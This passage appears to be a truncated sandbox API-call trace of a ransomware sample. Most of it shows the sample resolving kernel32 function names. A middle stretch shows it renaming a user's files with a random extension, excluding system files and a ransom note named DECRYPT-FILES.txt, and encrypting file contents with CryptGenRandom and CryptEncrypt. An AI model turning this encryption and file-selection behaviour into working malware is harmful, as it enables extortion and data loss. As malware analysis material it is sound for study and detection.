lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.853] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.853] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.853] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.853] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.853] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.853] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.853] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.853] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.853] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.853] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.854] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.854] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.854] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.854] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.854] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.854] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.854] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.854] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.854] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.854] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.854] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.854] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.854] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.854] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.854] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.854] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.854] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.854] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.854] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.855] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.855] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.855] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\17tvF0H1H-L.mkv") returned 53 [0082.855] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\17tvF0H1H-L.mkv.hdzyF") returned 59 [0082.855] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\17tvF0H1H-L.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\17tvf0h1h-l.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\17tvF0H1H-L.mkv.hdzyF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\17tvf0h1h-l.mkv.hdzyf"), dwFlags=0x0) returned 1 [0082.856] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.856] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.856] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.856] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe161c200, ftCreationTime.dwHighDateTime=0x1d4c748, ftLastAccessTime.dwLowDateTime=0xde625ea0, ftLastAccessTime.dwHighDateTime=0x1d4d212, ftLastWriteTime.dwLowDateTime=0xde625ea0, ftLastWriteTime.dwHighDateTime=0x1d4d212, nFileSizeHigh=0x0, nFileSizeLow=0x10a58, dwReserved0=0x0, dwReserved1=0x0, cFileName="3Evtxg4xh6 tW 9uys.bmp", cAlternateFileName="3EVTXG~1.BMP")) returned 1 [0082.856] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp", lpString2="DECRYPT-FILES.txt") returned -1 [0082.856] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp", lpString2="autorun.inf") returned -1 [0082.856] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp", lpString2="boot.ini") returned -1 [0082.856] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp", lpString2="desktop.ini") returned -1 [0082.856] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp", lpString2="ntuser.dat") returned -1 [0082.856] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp", lpString2="iconcache.db") returned -1 [0082.856] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp", lpString2="bootsect.bak") returned -1 [0082.856] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp", lpString2="ntuser.dat.log") returned -1 [0082.856] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp", lpString2="thumbs.db") returned -1 [0082.857] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp", lpString2="Bootfont.bin") returned -1 [0082.857] lstrlenW (lpString="3Evtxg4xh6 tW 9uys.bmp") returned 22 [0082.857] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0082.857] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0082.857] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0082.857] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0082.857] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.857] lstrlenW (lpString="3Evtxg4xh6 tW 9uys.bmp") returned 22 [0082.857] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0082.857] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="3Evtxg4xh6 tW 9uys.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Evtxg4xh6 tW 9uys.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Evtxg4xh6 tW 9uys.bmp" [0082.857] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Evtxg4xh6 tW 9uys.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3evtxg4xh6 tw 9uys.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.857] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=68184) returned 1 [0082.857] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.857] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.858] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.858] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.858] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.858] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.858] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.859] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.859] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.860] CloseHandle (hObject=0x43c) returned 1 [0082.860] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.860] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.861] CloseHandle (hObject=0x0) returned 0 [0082.861] CloseHandle (hObject=0x438) returned 1 [0082.861] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.862] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.862] GetTickCount () returned 0x114d2f9 [0082.862] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.862] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.862] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.862] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.862] lstrlenA (lpString="kernel32.dll") returned 12 [0082.863] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.863] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.863] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.863] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.863] lstrlenA (lpString="ADDATOMA") returned 8 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.863] lstrlenA (lpString="ADDATOMW") returned 8 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.863] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.863] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.863] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.863] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.863] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.863] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.863] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.863] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.864] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.864] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.864] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.864] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.864] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.864] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.864] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.864] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.864] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.864] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.864] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.865] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.865] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.865] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.865] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.865] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.865] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.865] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.865] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.865] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.865] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.865] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.865] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.865] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.865] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.865] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.865] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.865] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.865] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.865] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.866] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.866] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.866] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.866] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.866] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.866] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.866] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.866] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.866] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.866] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.866] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.866] lstrlenA (lpString="BEEP") returned 4 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.866] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.866] 